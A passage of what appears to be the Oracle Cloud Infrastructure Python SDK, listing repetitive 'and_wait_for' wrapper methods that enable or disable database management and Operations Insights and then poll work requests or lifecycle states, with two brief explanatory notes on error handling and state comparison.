as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.disable_autonomous_database_management(autonomous_database_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def disable_autonomous_database_operations_insights_and_wait_for_work_request(self, autonomous_database_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.disable_autonomous_database_operations_insights` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str autonomous_database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.disable_autonomous_database_operations_insights`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.disable_autonomous_database_operations_insights(autonomous_database_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def disable_database_management_and_wait_for_work_request(self, database_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.disable_database_management` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.disable_database_management`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.disable_database_management(database_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def disable_database_management_and_wait_for_state(self, database_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.disable_database_management` and waits for the :py:class:`~oci.database.models.Database` acted upon
to enter the given state(s).
:param str database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.Database.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.disable_database_management`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.disable_database_management(database_id, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_database(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
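Every method in this class ends with the same error-handling contract: if the initial service call succeeds but the subsequent wait fails, the raised exception still carries the completed operation's result in ``partial_results``, so the caller can tell that the mutation itself went through. A toy illustration of that contract (the class sketched here is hypothetical; the real one is ``oci.exceptions.CompositeOperationError``):

```python
class CompositeOperationError(Exception):
    """Toy version of oci.exceptions.CompositeOperationError: carries the
    results of the calls that did succeed, plus the underlying cause."""
    def __init__(self, partial_results=None, cause=None):
        super().__init__(str(cause))
        self.partial_results = partial_results or []
        self.cause = cause


def operation_then_wait(operation, waiter):
    """Run the mutating call, then the waiter; on waiter failure, surface
    the already-obtained operation result inside the composite error."""
    operation_result = operation()
    try:
        return waiter(operation_result)
    except Exception as e:
        raise CompositeOperationError(partial_results=[operation_result], cause=e)
```

This is why catching the composite error and reading ``partial_results`` is often more useful than treating a wait timeout as a failed operation.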
def disable_external_container_database_database_management_and_wait_for_work_request(self, external_container_database_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.disable_external_container_database_database_management` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str external_container_database_id: (required)
The ExternalContainerDatabase `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.disable_external_container_database_database_management`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.disable_external_container_database_database_management(external_container_database_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def disable_external_non_container_database_database_management_and_wait_for_work_request(self, external_non_container_database_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.disable_external_non_container_database_database_management` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str external_non_container_database_id: (required)
The external non-container database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.disable_external_non_container_database_database_management`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.disable_external_non_container_database_database_management(external_non_container_database_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def disable_external_non_container_database_operations_insights_and_wait_for_work_request(self, external_non_container_database_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.disable_external_non_container_database_operations_insights` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str external_non_container_database_id: (required)
The external non-container database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.disable_external_non_container_database_operations_insights`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.disable_external_non_container_database_operations_insights(external_non_container_database_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def disable_external_pluggable_database_database_management_and_wait_for_work_request(self, external_pluggable_database_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.disable_external_pluggable_database_database_management` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str external_pluggable_database_id: (required)
The ExternalPluggableDatabaseId `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.disable_external_pluggable_database_database_management`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.disable_external_pluggable_database_database_management(external_pluggable_database_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def disable_external_pluggable_database_operations_insights_and_wait_for_work_request(self, external_pluggable_database_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.disable_external_pluggable_database_operations_insights` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str external_pluggable_database_id: (required)
The ExternalPluggableDatabaseId `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.disable_external_pluggable_database_operations_insights`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.disable_external_pluggable_database_operations_insights(external_pluggable_database_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def enable_autonomous_database_management_and_wait_for_work_request(self, autonomous_database_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.enable_autonomous_database_management` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str autonomous_database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.enable_autonomous_database_management`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.enable_autonomous_database_management(autonomous_database_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def enable_autonomous_database_operations_insights_and_wait_for_work_request(self, autonomous_database_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.enable_autonomous_database_operations_insights` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str autonomous_database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.enable_autonomous_database_operations_insights`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.enable_autonomous_database_operations_insights(autonomous_database_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def enable_database_management_and_wait_for_work_request(self, database_id, enable_database_management_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.enable_database_management` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.EnableDatabaseManagementDetails enable_database_management_details: (required)
Request to enable the Database Management service for an Oracle Database located in Oracle Cloud Infrastructure.
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.enable_database_management`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.enable_database_management(database_id, enable_database_management_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def enable_database_management_and_wait_for_state(self, database_id, enable_database_management_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.enable_database_management` and waits for the :py:class:`~oci.database.models.Database` acted upon
to enter the given state(s).
:param str database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.EnableDatabaseManagementDetails enable_database_management_details: (required)
Request to enable the Database Management service for an Oracle Database located in Oracle Cloud Infrastructure.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.Database.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.enable_database_management`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.enable_database_management(database_id, enable_database_management_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_database(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
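The ``evaluate_response`` lambdas above compare states case-insensitively, so callers may pass ``'AVAILABLE'`` or ``'available'`` interchangeably. A minimal stand-alone sketch of that check, using illustrative ``FakeDatabase``/``FakeResponse`` stand-ins rather than real SDK types:

```python
# Illustrative only: FakeDatabase and FakeResponse mimic the SDK's model
# and response objects just enough to exercise the state comparison.
class FakeDatabase:
    def __init__(self, lifecycle_state):
        self.lifecycle_state = lifecycle_state

class FakeResponse:
    def __init__(self, data):
        self.data = data

def reached_state(response, wait_for_states):
    # Mirrors the lambda: lower-case both sides, and treat a missing or
    # empty state as "not reached".
    lowered = [w.lower() for w in wait_for_states]
    state = getattr(response.data, 'lifecycle_state')
    return bool(state) and state.lower() in lowered

print(reached_state(FakeResponse(FakeDatabase('AVAILABLE')), ['available']))  # True
print(reached_state(FakeResponse(FakeDatabase('PROVISIONING')), ['AVAILABLE']))  # False
```

Note that the truthiness guard also makes the waiter keep polling when the service has not yet populated the state field.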
def enable_external_container_database_database_management_and_wait_for_work_request(self, external_container_database_id, enable_external_container_database_database_management_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.enable_external_container_database_database_management` and waits for the :py:class:`~oci.work_requests.models.WorkRequest`
to enter the given state(s).
:param str external_container_database_id: (required)
The ExternalContainerDatabase `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.EnableExternalContainerDatabaseDatabaseManagementDetails enable_external_container_database_database_management_details: (required)
Request to enable the Database Management Service for an external container database.
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.enable_external_container_database_database_management`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.enable_external_container_database_database_management(external_container_database_id, enable_external_container_database_database_management_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def enable_external_non_container_database_database_management_and_wait_for_work_request(self, external_non_container_database_id, enable_external_non_container_database_database_management_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.enable_external_non_container_database_database_management` and waits for the :py:class:`~oci.work_requests.models.WorkRequest`
to enter the given state(s).
:param str external_non_container_database_id: (required)
The external non-container database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.EnableExternalNonContainerDatabaseDatabaseManagementDetails enable_external_non_container_database_database_management_details: (required)
Request to enable the Database Management Service for an external non-container database.
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.enable_external_non_container_database_database_management`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.enable_external_non_container_database_database_management(external_non_container_database_id, enable_external_non_container_database_database_management_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def enable_external_non_container_database_operations_insights_and_wait_for_work_request(self, external_non_container_database_id, enable_external_non_container_database_operations_insights_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.enable_external_non_container_database_operations_insights` and waits for the :py:class:`~oci.work_requests.models.WorkRequest`
to enter the given state(s).
:param str external_non_container_database_id: (required)
The external non-container database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.EnableExternalNonContainerDatabaseOperationsInsightsDetails enable_external_non_container_database_operations_insights_details: (required)
Details to enable Operations Insights on the external non-container database
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.enable_external_non_container_database_operations_insights`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.enable_external_non_container_database_operations_insights(external_non_container_database_id, enable_external_non_container_database_operations_insights_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def enable_external_pluggable_database_database_management_and_wait_for_work_request(self, external_pluggable_database_id, enable_external_pluggable_database_database_management_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.enable_external_pluggable_database_database_management` and waits for the :py:class:`~oci.work_requests.models.WorkRequest`
to enter the given state(s).
:param str external_pluggable_database_id: (required)
The external pluggable database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.EnableExternalPluggableDatabaseDatabaseManagementDetails enable_external_pluggable_database_database_management_details: (required)
Request to enable the Database Management Service for an external database.
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.enable_external_pluggable_database_database_management`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.enable_external_pluggable_database_database_management(external_pluggable_database_id, enable_external_pluggable_database_database_management_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def enable_external_pluggable_database_operations_insights_and_wait_for_work_request(self, external_pluggable_database_id, enable_external_pluggable_database_operations_insights_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.enable_external_pluggable_database_operations_insights` and waits for the :py:class:`~oci.work_requests.models.WorkRequest`
to enter the given state(s).
:param str external_pluggable_database_id: (required)
The external pluggable database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.EnableExternalPluggableDatabaseOperationsInsightsDetails enable_external_pluggable_database_operations_insights_details: (required)
Details to enable Operations Insights on the external pluggable database
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.enable_external_pluggable_database_operations_insights`
:param dict waiter_kwargs:
